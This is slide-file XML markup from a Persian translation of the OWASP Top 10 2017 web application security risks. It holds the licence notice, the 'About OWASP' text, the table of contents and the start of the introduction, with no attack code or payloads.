            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6849380">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="338517">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924072">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sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>کپی رایت ۲۰۱۳ – ۲۰۱۷ بنیاد </a:t>
                      </a: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 OWASP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000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> این سند تحت لیسانس </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Creative </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>عمومی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>s Attribution Share-Alike 4.0. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> تولید شده است.</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fa-IR" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>برای هرگونه استفاده یا توزیع مجدد ، باید شرایط و مفاد این گواهی را برای دیگران شفاف سازی نمایید.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</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1" y="9232385"/>
            <a:ext cx="968784" cy="36720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191151785"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="3352800" cy="7703810"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3352800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="337711">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>فهرست مطالب</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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736609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924513710"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3352800" y="939601"/>
          <a:ext cx="3465385" cy="7703810"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3465385">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="380504">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>درباره </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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7323306">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>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پروژه</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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متن‌باز امنیت برنامه‌های کاربردی تحت وب</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یک</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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جامعه آزاد است که فعالیتش به قادرسازی سازمان‌ها به توسعه، خرید و حفظ اپلیکیشن‌ها و ‌</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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هایی که قابل اعتماد باشند اختصاص دارد.</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r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>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در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OWASP </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شما به این موارد به صورت رایگان و آزاد دسترسی خواهید داشت</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r">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="100"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR"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ابزارها و استانداردهای امنیت اپلیکیشن</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r">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="100"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>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کتاب‌های کامل در زمینه‌ی تست امنیتی اپلیکیشن‌ها، توسعه‌ی کد امن، و بررسی امنیت کد</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r">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="100"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>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ارائه‌ها و ویدیوها</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lvl="0" indent="-82550" algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="100"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>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جداول تقلب در موضوعات مختلف</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lvl="0" indent="-82550" algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="100"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>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کنترل‌ها و کتابخانه‌های امنیتی استاندارد</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r">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="100"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>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گردهمایی محلی در تمام دنیا</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r">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="100"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>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تحقیقات به روز</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r">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="100"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>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کنفرانس‌های گسترده در تمام دنیا</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r">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="100"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>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میل لیست‌ها</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r" rtl="0">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r>
                      <a:b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در اینجا میتوانید اطلاعات بیشتری کسب کنید</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rPr>
                        <a:t>https://www.owasp.org</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gn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>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.تمام ابزارها، مدارک، ویدیوها، ارائه‌ها و گردهمایی‌های</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OWASP </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برای هرکسی که به ارتقا سطح امنیتی برنامه‌ها علاقه‌مند است به صورت رایگان و آزاد</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قابل دسترس است</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r">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>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ما طرفدار رویکرد بررسی امنیت برناه ها بعنوان یک مشکل مربوط به مردم، مشکل پردازشی یا مشکلات مربوط به تکنولوژی هستیم. چرا که موثرترین رویکرد در حوزه‌ی امنیت اپلیکیشن نیازمند ارتقا در این حوزه هاست.</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r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>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نوعی ساازمان جدید است. عدم وابستگی ما به فشارهای تبلیغاتی به ما این اجازه را میدهد که اطلاعاتی فارغ از تعصب ، عملی و تجربی و مقرون به صرفه را در مورد امنیت برنامه‌ها ارائه دهیم.</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lvl="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>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به هیچ کمپانی‌ای در حوزه تکنولوژی وابسته نیست. گرچه ما از استفاده از تکنولوژی امنیتی بازرگانی حمایت میکنیم.</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تولید کننده انواع مختلفی از محتوا به صورت مشارکتی ، بی شبهه و مستقیم است.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>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بنیاد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OWASP </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در ذات غیرسودآور است و بدنبال موفقیت این پروژه در درازمدت است. تقریبا هر همکاری با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به صورت داوطلبانه است که شامل کادر</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OWASP </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رهبران گروه‌های محلی، رهبران پروژه، و اعضای دخیل در پروژه می‌شود. ما از اهداها و کمک‌ها و زیرساخت‌ها در زمینه تحقیقات امنیتی حمایت میکنیم</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>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به ما ملحق شوید.</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fa-IR" sz="3200" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>فهرست</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2800" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>	فهرست مطالب</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2612953853"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="31194" y="1262590"/>
          <a:ext cx="3321606" cy="7191151"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2983203">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="338403">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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fa-IR"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درباره </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="120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OWASP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fa-I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پیشگفتار</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9"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0"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fa-I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ریسک های امنیت برنامه ها</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1"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4185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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ده ریسک امنیتی برتر </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>برای برنامه</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–2017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fa-I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تزریق</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fa-I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نقض احراز هویت</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fa-I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افشا</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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اطلاعات حساس</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fa-I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نقض کنترل دسترسی</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fa-I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پیکربندی اشتباه امنیتی</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4185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fa-I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استفاده از مولفه هایی با آسیب پذیری شناخته شده</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fa-I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fa-I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نظارت و ثبت سیاهه ناکافی</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fa-I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قدم بعدی برای توسعه دهندگان</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fa-I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قدم بعدی برای تست کنندگان امنیت</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fa-I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قدم بعدی برای سازمان‌ها</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fa-I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قدم بعدی برای مدیران برنامه‌ها</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9"/>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fa-I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یادداشتی در مورد خطر</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0"/>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fa-I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جزئیاتی در مورد شاخص‌های خطر</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1"/>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fa-I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روش شناسی و داده</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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="259473">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fa-IR"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سپاسگزاری</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3044096719"/>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603625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>روند امنیت برنامه کاربردی خود را حالا شروع کنید</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362776">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>امنیت برنامه دیگر اختیاری نیست. بین افزایش حملات و فشارهای نظارتی، سازمان ها باید پروسه های موثر و قابلیت های لازم را برای تأمین برنامه های کاربردی و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>API </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> ها خود ایجاد کنند. با توجه به مقدار قابل توجهی از کد در برنامه های کاربردی و  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>های متعدد در حال حاضر در تولید، بسیاری از سازمان ها در حال تلاش برای رسیدگی به حجم زیادی از آسیب پذیری.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" baseline="0" dirty="0">
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> توصیه سازمان ها برای ایجاد بینش و بهبود امنیت در بین برنامه ها و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
